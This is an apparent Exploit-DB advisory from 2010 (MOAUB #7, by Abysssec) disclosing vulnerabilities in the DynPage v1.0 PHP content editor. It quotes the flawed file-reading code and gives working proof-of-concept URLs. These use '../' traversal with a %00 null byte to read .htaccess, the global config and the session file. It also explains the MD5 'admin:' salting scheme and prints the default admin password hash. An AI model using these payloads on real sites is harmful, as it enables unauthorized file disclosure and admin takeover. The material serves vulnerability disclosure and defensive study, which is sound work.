[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : MOAUB #7 - DynPage <= v1.0 Multiple Remote Vulnerabilities - 0day
# Published : 2010-09-07
# Author : Abysssec
# Previous Title : Java Bridge v. 5.5 Directory Traversal Vulnerability
# Next Title : Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability 


'''
  __  __  ____         _    _ ____  
 |  /  |/ __    /  | |  | |  _  
 |   / | |  | | /   | |  | | |_) |
 | |/| | |  | |/ / | |  | |  _ < 
 | |  | | |__| / ____  |__| | |_) |
 |_|  |_|____/_/    _____/|____/ 

 http://www.exploit-db.com/moaub-7-dynpage-multiple-remote-vulnerabilities/
'''

- Title  : DynPage Multiple Remote Vulnerabilities.
- Affected Version : <= v1.0
- Vendor  Site   : http://www.dynpage.net
 
- Discovery : Abysssec.com
 
 
- Description :
===============
DynPage allows you to edit Websites online and make pieces of contents editable with a comfortable editor.
DynPage implements the CKeditor - one of the best Internet editors. 
The integration of content into the HTML pages can be done with Ajax/Javascript or PHP - so you can also handle cross domain sites. 
DynPage is written in PHP and does not require MySQL database. It's easy to install and to configurate.

- Vulnerabilities:
==================
1)Local File Disclosure:
---------------------
	+Code:
	/content/dynpage_load.php #[line(20-28)]:

	$filename = $_GET["file"];
	if (!is_dir ($filename) && file_exists ($filename)) {
	
		$bytes = filesize ($filename);
		$fh = fopen($filename, 'r');
		print (fread ($fh, $bytes));
		fclose ($fh);

	}


	+POC: 
	     http://www.Site.com/dynpage/content/dynpage_load.php?file=../.htaccess%00


2)Admin hash Disclosure:
---------------------------------
	The Admin password hash format:	MD5('admin:'+$password)
	then password's salt is "admin:".

	2-a)Default password is admin,that stored in config_global.inc.php(line 41-42 )
			// Default login admin
			"default_login_hash" => "d2abaa37a7c3db1137d385e1d8c15fd2",
	+POC:for see this hash:
	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../config_global.inc.php%00

	2-b)the hash  password  stored as SESSION in /conf/init.inc.php.
		<?php
			// This file is generated automatically!
			// No not modify manually!
			$_SESSION['DYNPAGE_CONF_VAR_ALL']['login_hash']="2d08086927f4d87a31154aaf0ba2e067";
			$_SESSION['DYNPAGE_CONF_VAR_ALL']['admin_email']="a@a.com";
		?>
	+POC:for see this hash:
	  http://www.Site.com/dynpage/content/dynpage_load.php?file=../conf/init.inc.php%00